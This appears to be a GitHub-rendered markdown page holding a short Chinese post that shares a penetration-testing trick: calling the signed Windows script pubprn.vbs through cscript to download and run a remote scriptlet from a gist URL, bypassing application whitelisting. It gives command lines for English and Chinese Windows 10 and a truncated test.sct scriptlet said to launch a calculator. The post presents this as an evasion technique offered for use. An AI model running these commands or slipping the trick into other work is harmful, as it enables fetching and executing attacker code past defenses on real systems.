Skip to content

Latest commit

 

History

History
50 lines (30 loc) · 1.62 KB

28511224554581.md

File metadata and controls

50 lines (30 loc) · 1.62 KB

#给大家分享点具体渗透姿势,比如白名单下载恶意代码的一个技巧。

tags: #姿势#,

给大家分享点具体渗透姿势,比如白名单下载恶意代码的一个技巧。

OPCDE 里看到的一个技巧:

cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs blah "script:https://gist.githubusercontent.com/enigma0x3/64adf...

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs blah "script:https://gist.githubusercontent.com/enigma0x3/64adf...

简单说下:

第一个是英文的 Win10,第二个是中文的 Win10。test.sct 里的代码会弹个计算器。pubprn.vbs 是 Win 系统自带的,被签名过的。通过这种方式,可以 bypass 一些防御。pubprn.vbs 充当 downloader 角色。

中文,我自己实测的,据其他圈友测试 Win7/XP 都 OK。

test.sct代码如下:

<registration description="Bandit" progid="Bandit" version="1.00" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" remotable="true"

<script language="JScript"> </script>